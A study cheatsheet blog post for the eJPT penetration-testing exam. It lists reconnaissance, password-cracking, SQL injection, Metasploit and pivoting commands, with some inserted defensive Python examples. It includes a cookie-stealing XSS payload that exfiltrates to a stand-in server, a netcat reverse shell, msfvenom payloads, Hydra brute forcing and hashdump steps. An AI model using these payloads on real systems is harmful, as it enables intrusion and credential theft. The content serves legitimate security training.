Introduction
Anyone in the information security or penetration testing field knows how deep a topic, or even a single certificate, can go, and as we progress deeper into the field it gets harder to keep track of the knowledge gained. For me personally, notes, cheatsheets and mind maps are the best way to keep track of things.
As far as studies go, the eLearnSecurity Junior Penetration Tester (eJPT) is an entry-level, beginner-friendly certification and a great starting point for the fundamentals of networking, programming and penetration testing, all for an affordable price.
It is a 100% practical certification with great labs and excellent learning materials, which cover TCP/IP, IP routing, and LAN protocols and devices on the networking side. On the penetration testing side, it covers the essential processes and methodologies, basic vulnerability assessments of networks and web applications, and finally exploitation via Metasploit. As a bonus, it also covers the basics of programming languages such as C++, Python and Bash.
Of course, in this blog post I won’t cover the entirety of the course materials, nor any theory; it only serves as a commands cheatsheet to aid students at a quick glance.
Information Gathering
Information gathering is the most essential part of any penetration test. Without information about the networks, web applications or technologies we are dealing with, we won’t be able to do much.
So, whenever you find yourself stuck or not getting anywhere, it means you haven’t enumerated enough; fall back to the information gathering or enumeration phase.
Discovery
Once we are on a new network, it is important to discover assets, or targets. We will show the various methods of discovery covered in the course, plus a few additional tools which may prove helpful.
Ping Sweep
Using fping:
fping -a -g <ip_range>
# example
fping -a -g 10.10.10.0/24
Using nmap:
nmap -sn <ip_range>
# example
nmap -sn 10.10.10.0/24
Additional Tools
Using arp-scan:
arp-scan -l
Using netdiscover:
netdiscover -r <ip_range>
# example
netdiscover -r 10.10.10.0/24
Using masscan:
masscan <ip_range>
# example
masscan 10.10.10.0/24
Routing
If we discovered a different network subnet through another source and noticed that we can’t reach it from our machine, we can add a route to that network.
To display the current routes:
Using route in Linux:
route -n
Using ip in Linux:
ip route
Using arp in Linux and Windows:
arp -a
To add a route and pivot
In Linux:
ip route add <ip/cidr> via <from_ip>
# example
ip route add 10.10.11.0/24 via 10.10.11.85
In Windows:
route ADD <ip> MASK <mask> <from_ip>
# example
route ADD 10.10.10.0 MASK 255.255.255.0 10.10.10.85
Wireshark Snippets
http.request.method == "POST"
http & ip.src == 192.168.0.1
tcp.port == 80
tcp.srcport == 21
http.request
- After capturing or opening traffic: Follow -> TCP Stream
Scanning
After we have discovered our targets, we have to probe them in order to find out what they are running. Is it a server, a printer or a router? Here are a few methods for scanning:
Nmap
To use SYN scan for specific ports:
nmap -sS -p <port,port> <ip>
# example
nmap -sS -p 22,80,443,445 10.10.10.10
To use TCP scan on all ports with verbose output and increased speed:
nmap -sT -p- -v -T4 <ip>
# example
nmap -sT -p- -v -T4 10.10.10.10
To skip DNS resolution, treat the host as up, and save the output to a file:
nmap -sT -n -Pn -oN <outputFile> <ip>
# example
nmap -sT -n -Pn -oN output.nmap 10.10.10.10
Enumeration
When we are done scanning and have noted the servers, printers, routers, etc., we proceed to enumerate our targets by gathering version information, vulnerability information and probe information.
Network Enumeration
Nmap
To use the version scan:
nmap -sV 10.10.10.10
To use the OS scan:
nmap -O 10.10.10.10
To aggressively scan:
nmap -A 10.10.10.10
To use the default script scan:
nmap -sC 10.10.10.10
Nmap Scripting Engine
Using script categories (the complete list of categories is in the Nmap NSE documentation):
# to discover more details and versions
nmap --script discovery 10.10.10.10
# to discover known vulnerabilities
nmap --script vuln 10.10.10.10
To use a specific script instead of a category, the scripts are found in /usr/share/nmap/scripts/:
# look for the script you want
ls /usr/share/nmap/scripts | grep smb
# run it without the file extension (.nse)
nmap --script smb-enum-shares 10.10.10.10
# the * wildcard runs all scripts of a specific module
nmap --script smb-* 10.10.10.10
Windows Shares
Using nbtstat in Windows:
nbtstat -A 10.10.10.10
Using net view in Windows:
# to list shares
net view 10.10.10.10
# to mount a share
net use \\10.10.10.10\shareName
# to mount with null session
net use \\10.10.10.10\shareName '' /u:''
Using nmblookup in Linux:
nmblookup -A 10.10.10.10
Using enum4linux in Linux:
enum4linux -a 10.10.10.10
Using smbclient to enumerate and mount shares in Linux:
# to list available shares
smbclient -L //10.10.10.10
# to list with a null session (no password)
smbclient -L //10.10.10.10 -N
# to mount a found share with null session
smbclient //10.10.10.10/shareName -N
NOTE: Nmap can also enumerate shares and websites via scripts; it can also test for broken authentication and brute force logins. Play around with the scripts in /usr/share/nmap/scripts/ and search for http or smb.
Web Enumeration
If the target is running a web server, we will want to probe the website both manually and automatically for information about the technologies behind it.
Directory Busting
Using dirb:
# using default wordlist
dirb http://10.10.10.10
# using authentication username:password
dirb http://10.10.10.10/project/backup -u admin:admin
# using extensions for web pages
dirb http://10.10.10.10 -X .php
For more comprehensive and advanced usage of dirb, check the article by HackingArticles.
Subdomain Enumeration
DNSDumpster caches subdomains if you wish to look for them passively.
Using sublist3r:
sublist3r -v -d <domain> -b
# example
sublist3r -v -d example.com -b
Using OWASP’s Amass:
# installation via snap
sudo apt install snapd
sudo service snapd start
sudo snap install amass
# basic usage
amass -ip -d google.com
Using gobuster:
gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
# with extensions for web pages
gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,txt,bak,old,html,xxx
Web Server Enumeration
Using nikto:
nikto -h http://10.10.10.10
# for https websites
nikto -h https://10.10.10.10 -ssl
Using netcat for HTTP:
nc -v target.site 80
HEAD / HTTP/1.0
# GET HTTP verb example
GET /page.php HTTP/1.0
Host: www.example.com
# POST HTTP verb example
POST /login.php HTTP/1.0
Host: www.example.com
username=potato&password=potato
# PUT HTTP verb example
PUT /path/to/destination HTTP/1.0
Host: www.example.com
username=tomato&password=tomato
# DELETE HTTP verb example
DELETE /path/to/destination HTTP/1.0
Host: www.example.com
# OPTIONS HTTP verb example
OPTIONS / HTTP/1.0
Host: www.example.com
Using openssl for HTTPS:
openssl s_client -connect target.site:443
HEAD / HTTP/1.0
NOTE: Nessus can also do all the above, but we won’t cover that; maybe in a future blog post.
Exploitation
After we have enumerated thoroughly, we proceed to search for available exploits matching our enumerated target’s versions, and exploit it.
Password Attacks
A dictionary attack can always be useful, especially if our targets have simple passwords and/or reuse old passwords.
Cracking the Linux users’ password hashes:
- First we need both the /etc/passwd and /etc/shadow files; combined, they let us crack the passwords.
unshadow passwd shadow > crackable_passwords.txt
- Then we use John the Ripper to crack the passwords with a dictionary attack:
# we can restrict cracking to specific users from the file
john --users=root,potato --wordlist=/usr/share/wordlists/rockyou.txt crackable_passwords.txt
# to display cracked passwords
john crackable_passwords.txt --show
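Before feeding a merged file to John it is worth knowing which accounts would fall quickly. The following added example, not code from the original post or from John the Ripper, performs the same merge as unshadow on constructed /etc/passwd and /etc/shadow excerpts (the hash strings are placeholders shaped like crypt(3) output) and reports, per account with a login shell, how strong its stored hash type is, flagging empty password fields and fast md5crypt/DES hashes. It assumes the standard colon-separated field layout of both files.

```python
# Constructed /etc/passwd and /etc/shadow excerpts (not from any real host).
# The hash fields are placeholders shaped like real crypt(3) strings.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
potato:x:1000:1000::/home/potato:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
guest:x:1001:1001::/home/guest:/bin/bash
"""
SHADOW_SAMPLE = """\
root:$6$saltsalt$placeholdersha512hash:18000:0:99999:7:::
potato:$1$abcdefgh$placeholdermd5hash:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
guest::18000:0:99999:7:::
"""

# crypt(3) prefixes and how they hold up against a wordlist attack.
HASH_TYPES = {
    "$1$": "md5crypt (weak, fast to crack)",
    "$2": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}

def parse_colon_file(text):
    """Map the first field (user name) of each line to the list of its fields."""
    return {line.split(":")[0]: line.split(":") for line in text.splitlines() if line.strip()}

def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(1): passwd lines with the 'x' replaced by the shadow hash."""
    shadow = parse_colon_file(shadow_text)
    merged = []
    for name, fields in parse_colon_file(passwd_text).items():
        if name in shadow:
            fields = fields[:1] + [shadow[name][1]] + fields[2:]
        merged.append(":".join(fields))
    return merged

def classify_hash(field):
    """Classify a shadow password field for an audit report."""
    if field == "":
        return "EMPTY: login without a password"
    if field.startswith(("!", "*")):
        return "locked / no password login"
    for prefix, label in HASH_TYPES.items():
        if field.startswith(prefix):
            return label
    return "unknown or legacy DES (weak)"

def audit_shadow(shadow_text, passwd_text):
    """Report the hash class of every account that has a usable login shell."""
    passwd = parse_colon_file(passwd_text)
    report = {}
    for name, fields in parse_colon_file(shadow_text).items():
        shell = passwd.get(name, [""] * 7)[6]
        if shell.endswith(("nologin", "false")):
            continue  # cannot log in interactively, skip
        report[name] = classify_hash(fields[1])
    return report

if __name__ == "__main__":
    for line in unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(line)
    for user, verdict in audit_shadow(SHADOW_SAMPLE, PASSWD_SAMPLE).items():
        print(f"{user}: {verdict}")
```

Running it on real files (as root) gives the same list John would receive, plus an immediate view of the accounts an administrator should fix first: empty password fields and md5crypt or DES hashes.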
Hashcat
# to list example hashes for mode identification
hashcat --example-hashes
# example command
hashcat -m 0 -a 0 -D2 example.hash wordlists.txt
Hydra
Hydra is a powerful brute forcer; it supports many different protocols for dictionary attacks:
# for help on specific module
hydra -U rdp
hydra -U http-get
# example command
hydra -L users.lst -P passwords.lst <service_name://server> <options>
# for ssh
hydra -l root -P rockyou.txt ssh://10.10.10.10
# for ftp
hydra -L users.lst -P passwords.lst ftp://10.10.10.10
# for HTTP login
hydra -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt crackme.site http-post-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credentials" -f -V
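The SSH dictionary attack above is loud: every attempt leaves a line in the server's auth log. The following added example, not code from the original post or from Hydra, shows the detection side: it parses constructed sshd lines in the default syslog format (assumed to match OpenSSH's "Failed password for ... from ... port" wording), counts failures per source IP in a sliding time window, and marks the worst case, a successful login from the same source right after the burst. The year is assumed because syslog timestamps carry none.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in the default syslog format (not a real capture). One source
# fails five times within seconds and then succeeds; another fails once and then uses a key.
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 web01 sshd[2011]: Failed password for root from 10.10.10.85 port 50321 ssh2
Mar 10 12:00:02 web01 sshd[2012]: Failed password for invalid user admin from 10.10.10.85 port 50322 ssh2
Mar 10 12:00:03 web01 sshd[2013]: Failed password for root from 10.10.10.85 port 50323 ssh2
Mar 10 12:00:04 web01 sshd[2014]: Failed password for root from 10.10.10.85 port 50324 ssh2
Mar 10 12:00:05 web01 sshd[2015]: Failed password for invalid user oracle from 10.10.10.85 port 50325 ssh2
Mar 10 12:00:06 web01 sshd[2016]: Accepted password for root from 10.10.10.85 port 50326 ssh2
Mar 10 12:30:00 web01 sshd[2100]: Failed password for alice from 10.10.10.20 port 41000 ssh2
Mar 10 12:31:00 web01 sshd[2101]: Accepted publickey for alice from 10.10.10.20 port 41001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_auth_log(text, year=2021):
    """Return (timestamp, result, user, ip) tuples; the year is assumed, syslog omits it."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an sshd authentication line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag each source IP with at least `threshold` failures inside any `window`, and
    record whether a successful login from that IP followed the burst (the worst case)."""
    failures = defaultdict(list)
    for ts, result, _user, ip in events:
        if result == "Failed":
            failures[ip].append(ts)
    findings = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over the sorted failure times
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = times[end]
                succeeded = any(r == "Accepted" and e_ip == ip and e_ts >= burst_end
                                for e_ts, r, _u, e_ip in events)
                findings[ip] = {"failures": len(times), "success_after_burst": succeeded}
                break
    return findings

if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

The threshold and window are the knobs a blue team tunes: five failures in a minute catches Hydra's default parallelism immediately, while a single mistyped password from a legitimate user is left alone.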
Web Exploitation
Vulnerabilities may also be found on web applications if the programming logic is flawed or not handled correctly.
Cross Site Scripting (XSS)
Three kinds of Cross Site Scripting (XSS) attacks:
- Reflected XSS
- Stored XSS
- DOM XSS
Testing for XSS with an alert popup:
<script>alert('XSS');</script>
Cookie stealing proof-of-concept via alert popup:
<script>alert(document.cookie)</script>
Cookie stealing by making the victim’s browser send the data to our malicious server:
- Create a simple PHP file, log.php, that will append the data to another file:
<?php
$filename="/tmp/log.txt";
$fp=fopen($filename, 'a');
$cookie=$_GET['q'];
fwrite($fp, $cookie);
fclose($fp);
?>
- Leverage the XSS to call our server, passing the cookie along:
<script>
var i = new Image();
i.src="http://our.site/log.php?q="+document.cookie;
</script>
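Both payloads above rely on two things: the application echoing input into the page unencoded, and the session cookie being readable from document.cookie. The following added example, not code from the original post, shows the corresponding fixes in Python: a vulnerable reflection beside its output-encoded form (using html.escape), a Set-Cookie value carrying HttpOnly, Secure and SameSite, and a small audit helper that lists which of those flags a given Set-Cookie header is missing. The comment template and cookie name are assumed for the example.

```python
import html

# The two test payloads from the cheatsheet, reused here as constructed input.
PAYLOADS = ["<script>alert('XSS');</script>", "<script>alert(document.cookie)</script>"]

# Assumed page fragment into which user-supplied text is inserted.
TEMPLATE = '<div class="comment">{}</div>'

def render_comment_vulnerable(user_input):
    """Reflects the input verbatim, so a payload becomes live markup in the page."""
    return TEMPLATE.format(user_input)

def render_comment_safe(user_input):
    """Output-encodes for an HTML text context: < > & " ' become entities, so the
    browser renders the payload as text instead of executing it."""
    return TEMPLATE.format(html.escape(user_input, quote=True))

def contains_script_tag(rendered_html):
    """Check used in the test: does the rendered page still contain a raw <script tag?"""
    return "<script" in rendered_html.lower()

def build_session_cookie(session_id):
    """Set-Cookie value for the session: HttpOnly keeps it out of document.cookie (so the
    cookie-stealing payloads above read nothing), Secure limits it to HTTPS, and
    SameSite=Strict stops cross-site requests from carrying it."""
    return f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Strict"

def missing_cookie_flags(set_cookie_value):
    """Audit helper: list the hardening attributes absent from a Set-Cookie value."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie_value.split(";")[1:]}
    return sorted(flag for flag in ("httponly", "samesite", "secure") if flag not in attrs)

if __name__ == "__main__":
    for p in PAYLOADS:
        print("vulnerable:", render_comment_vulnerable(p))
        print("safe:      ", render_comment_safe(p))
    print(build_session_cookie("abc123"))
    print("missing on 'session=abc123; Path=/':", missing_cookie_flags("session=abc123; Path=/"))
```

The encoding must match the context (an attribute or a JavaScript string needs different escaping than a text node); html.escape covers the text-node case shown here. HttpOnly does not prevent the injection itself, it only removes the cookie from what a successful injection can reach.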
SQL Injections (SQLi)
Finding SQL Injections
To test an input for SQLi, try:
- String terminators: ' and "
- SQL commands: SELECT, UNION, etc.
- SQL comments: # or --
Enumerating using Boolean based SQLi
Examples:
select substring(user(), 1, 1);
select substring(user(), 1, 1) = 'r';
# returns true
select substring(user(), 1, 1) = 'a';
# returns false
# this way we can brute force for information
' or substr(user(), 1, 1)= 'a
' or substr(user(), 1, 1)= 'b
# ... and so on until we get the username
Exploiting Boolean Based SQLi
- An always true statement
' OR '1'='1
- An always false statement
' OR '1'='11
- Add a comment to nullify the remaining
' or 1=1; -- -'
Exploiting Union Based SQLi
' UNION SELECT user(); -- -
' UNION SELECT null; -- -
# if there is still an error, another field is required
' UNION SELECT null, null; -- -
# if there is still an error, another field is required, and so on
' UNION SELECT 'user1', 'user2'; -- -
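The following added example, not code from the original post, shows why the boolean-based payloads above work and what closes the hole. It builds an in-memory SQLite table with two constructed accounts and compares a login query assembled by string concatenation with the same query parameterised. The always-true and always-false payloads are the ones quoted above; since SQLite has no user() function, sqlite_version() (which starts with "3") stands in for it in the substr probe.

```python
import sqlite3

# Payloads quoted in the cheatsheet above, reused as constructed test input.
ALWAYS_TRUE = "' OR '1'='1"
ALWAYS_FALSE = "' OR '1'='11"
# Boolean probes in the style of the substr(user(),1,1) example; SQLite has no user(),
# so sqlite_version() stands in for it (its first character is "3").
PROBE_HIT = "' or substr(sqlite_version(),1,1)='3"
PROBE_MISS = "' or substr(sqlite_version(),1,1)='2"

def setup_db():
    """In-memory SQLite database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("potato", "tomato")])
    return conn

def login_vulnerable(conn, username, password):
    """String-concatenated query: whatever is in the password field is parsed as SQL,
    so ' OR '1'='1 turns the WHERE clause into (user AND pass) OR true."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]

def login_safe(conn, username, password):
    """Parameterised query: the same payloads are compared as literal strings."""
    sql = "SELECT username FROM users WHERE username=? AND password=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username, password))]

def boolean_oracle(conn, login, payload):
    """The boolean-based SQLi oracle: does the application act as if a row matched?"""
    return len(login(conn, "admin", payload)) > 0

if __name__ == "__main__":
    db = setup_db()
    for name, payload in [("true", ALWAYS_TRUE), ("false", ALWAYS_FALSE),
                          ("probe hit", PROBE_HIT), ("probe miss", PROBE_MISS)]:
        print(f"{name:10} vulnerable={login_vulnerable(db, 'admin', payload)} "
              f"safe={login_safe(db, 'admin', payload)}")
```

The vulnerable version answers the probes differently (rows or no rows), which is exactly the one bit per request that boolean-based extraction needs; the parameterised version returns nothing for every payload because the quote never reaches the SQL parser.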
SQLMap
sqlmap -u <url> -p <injection_param> [options]
# U for union based injections
sqlmap -u 'http://victim.site/view.php?id=1121' -p id --technique=U
# example of switches we will use
--current-db
-D <current_db> --tables
-D <db> -T <table> --columns
-D <db> -T <table> -C username,password --dump
For specific data extraction via blind SQLi using a POST parameter:
# to get database banner
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B --banner
# to get database name
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B --dbs
# to get database tables
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B -D blogdb --tables
# to get database table columns
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B -D blogdb -T users --columns
# to dump the selected columns of the table
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B -D blogdb -T users -C username,password --dump
To automate the above data dumping process:
sqlmap -u "http://sqlmap.test/login.php" --data='user=a&pass=a' -p user --technique=B --dump
To use SQLMap with a saved request:
# grab database banner
sqlmap -r login.req -p user --technique=B --banner
# to reset cache
sqlmap -r login.req -p user --technique=B --flush-session
# dump database
sqlmap -r login.req -p user --technique=B --dump
Host Exploitation
The host itself can also be exploited if the server/host is not up to date, or is running a vulnerable version of an application.
Netcat
We will use netcat to send a shell from victim to attacker:
# On attacker machine, listen with netcat
nc -lvnp 5555
# On victim machine, send shell back to attacker
ncat -e cmd.exe <attacker_ip> 5555
ARP Spoofing
# to enable ip forwarding in linux
echo 1 > /proc/sys/net/ipv4/ip_forward
# start spoofing on specified network interface and IP
arpspoof -i tap0 -t 10.10.10.2 -r 10.10.10.6
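What the arpspoof command above does on the wire is answer ARP for two addresses at once from one MAC, so the defensive check is to watch for IP-to-MAC changes and for a single MAC claiming several IPs. The following added example, not code from the original post or from any ARP tool, runs both checks over a constructed list of observed ARP replies (it assumes the replies were already captured by a sniffer and reduced to sequence number, sender IP and sender MAC) and an optional table of administrator-pinned mappings.

```python
from collections import defaultdict

# Constructed ARP reply observations, as a sniffer on the segment would record them:
# (sequence number, sender IP, sender MAC). 10.10.10.2 is the gateway and 10.10.10.6 a host;
# from record 3 on, a third MAC starts answering for both, which is the pattern the
# "arpspoof -t 10.10.10.2 -r 10.10.10.6" command above produces.
ARP_REPLIES = [
    (1, "10.10.10.2", "00:0c:29:aa:bb:02"),
    (2, "10.10.10.6", "00:0c:29:aa:bb:06"),
    (3, "10.10.10.2", "00:0c:29:de:ad:be"),
    (4, "10.10.10.6", "00:0c:29:de:ad:be"),
    (5, "10.10.10.2", "00:0c:29:de:ad:be"),
]

# Static mappings an administrator pinned for critical hosts (constructed).
KNOWN_GOOD = {"10.10.10.2": "00:0c:29:aa:bb:02"}

def detect_ip_mac_changes(replies, known_good=None):
    """Alert (seq, ip, seen_mac, expected_mac) whenever an IP is answered by a MAC other
    than its pinned mapping or, failing that, the first MAC seen for it."""
    known_good = {ip: mac.lower() for ip, mac in (known_good or {}).items()}
    first_seen = {}
    alerts = []
    for seq, ip, mac in replies:
        mac = mac.lower()
        expected = known_good.get(ip, first_seen.get(ip))
        if expected is not None and mac != expected:
            alerts.append((seq, ip, mac, expected))
        first_seen.setdefault(ip, mac)
    return alerts

def macs_claiming_multiple_ips(replies):
    """A single MAC answering for several IPs is the signature of a man-in-the-middle
    between two hosts: the attacker impersonates both ends of the conversation."""
    claims = defaultdict(set)
    for _seq, ip, mac in replies:
        claims[mac.lower()].add(ip)
    return {mac: sorted(ips) for mac, ips in claims.items() if len(ips) > 1}

if __name__ == "__main__":
    for alert in detect_ip_mac_changes(ARP_REPLIES, KNOWN_GOOD):
        print("IP/MAC change:", alert)
    print("MACs claiming multiple IPs:", macs_claiming_multiple_ips(ARP_REPLIES))
```

Without a pinned table the first observation is trusted, which is what arpwatch-style tools do; pinning the gateway in KNOWN_GOOD removes that race, and static ARP entries or dynamic ARP inspection on the switch are the corresponding preventive controls.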
Metasploit
The Metasploit Framework is built to aid in every step of a penetration test, from scanning and enumeration to exploitation and post-exploitation. Let’s see how it works.
MSFVenom
MSFVenom generates payloads:
# For a Linux executable payload
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=172.16.64.2 lport=59919 -f elf -o meter
# For a PHP payload
msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.4 lport=53 -o meterpreter.php
# For a .war payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.97.68.2 LPORT=443 -f war > shell.war
# for a Windows executable payload
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=172.16.64.2 lport=59919 -f exe -o meter.exe
MSFConsole
Quick usage:
# first start the database for metasploit
sudo systemctl start postgresql
# to run metasploit
sudo msfconsole
# to list all available commands
> help
# to search for any module (scanner, exploits, etc)
> search <name>
> search mssql
# to use a specific module
> use <name>
> use auxiliary/scanner/mssql/mssql_login
# to display that module's information
> info
# to display that module's options
> options
# to set that module's required options
> set <option> <value>
> set USER_FILE users.lst
# to run a module
> run
# to run in background
> exploit -j
# to go one back
> back
Payloads & Listeners
Payloads
80+ payloads are available:
# to list all payloads
msf > show payloads
# windows 32 bit payload
msf > set payload windows/meterpreter/reverse_tcp
# linux 32 bit payload
msf > set payload linux/x86/meterpreter/reverse_tcp
# windows 32 bit bind payload
msf > set payload windows/meterpreter/bind_tcp
# java bind payload
msf > set payload java/meterpreter/bind_tcp
Listener Setup
> use exploit/multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST <our_ip>
> set LPORT <our_port>
> exploit -j
Meterpreter
Enumeration
# computer info
meterpreter > sysinfo
# ip addr info
meterpreter > ifconfig
# print route info
meterpreter > route
# Get current user
meterpreter > getuid
# privilege escalation
meterpreter > getsystem
# print working directory
meterpreter > pwd
# change directory
meterpreter > cd Desktop
# download item
meterpreter > download passwords.txt
# upload item
meterpreter > upload backdoor.exe C:\\Windows\\system32 # escape backslash
# to show sessions
msf > sessions
# to interact with a specific session
msf > sessions -i <session_id>
msf > sessions -i 1
# to background or minimize a sessions
meterpreter > background
msf >
# open a cmd shell
meterpreter > shell
Post-Exploitation
After we have exploited a target, we can enumerate it for sensitive and further information, leading to the exploitation of more targets on the network or even on different network subnets.
Enumeration
NOTE: The Meterpreter section above also contains an enumeration guide via Meterpreter.
Linux:
# show network information
ifconfig
# show connected networks information
arp -a
# show ip routes
ip route
# show current user
id
Windows:
# show network information
ipconfig
# show connected networks information
arp -a
# show ip routes
route print
# show current user
whoami
# show current user privileges
whoami /priv
Privilege Escalation
# bypass UAC (user access control)
meterpreter > background
msf > search bypassuac
msf > use exploit/windows/local/bypassuac
msf > set session 1
msf > run
# dump password database
meterpreter > background
msf > use post/windows/gather/hashdump
msf > set session 1
msf > exploit
# migrate to another process with higher privileges
meterpreter > ps # list processes and pick one
meterpreter > migrate 2682 # process id
meterpreter > getsystem # to get higher privileges with new process id
Pivoting
SSH Tunneling
Port forwarding using SSH (local port first, then the destination host and port as seen from the SSH server):
ssh -L <local_port>:<target_host>:<target_port> <user>@<ssh_host>
# example
ssh -L 8080:localhost:8000 <user>@<ssh_host>
Meterpreter
Routing
# using route
msf > route print
msf > route add 192.179.61.0 255.255.255.0 1 # last number is session id
# using autoroute, can be done two ways
meterpreter > run autoroute -s 192.179.61.0 -n 255.255.255.0 # method 1
meterpreter > run autoroute -s 172.16.50.0/24 # method 2
# to print route
meterpreter > run autoroute -p
Port Forwarding
meterpreter > portfwd -h
meterpreter > portfwd add -l 1234 -p 21 -r 192.179.61.3
meterpreter > portfwd add -l 1235 -p 80 -r 192.179.61.2
Conclusion
My own personal notes for the eLearnSecurity Junior Penetration Tester (eJPT) course are very messy and unorganized because I’m too lazy to fix them up. So instead of doing that, I decided to make an organized cheatsheet in this blog post in case I ever wish to recall something, or if another student ever needs a quick helping guide for the eJPT exam.
I hope this cheatsheet helps you pass the exam as it did for me.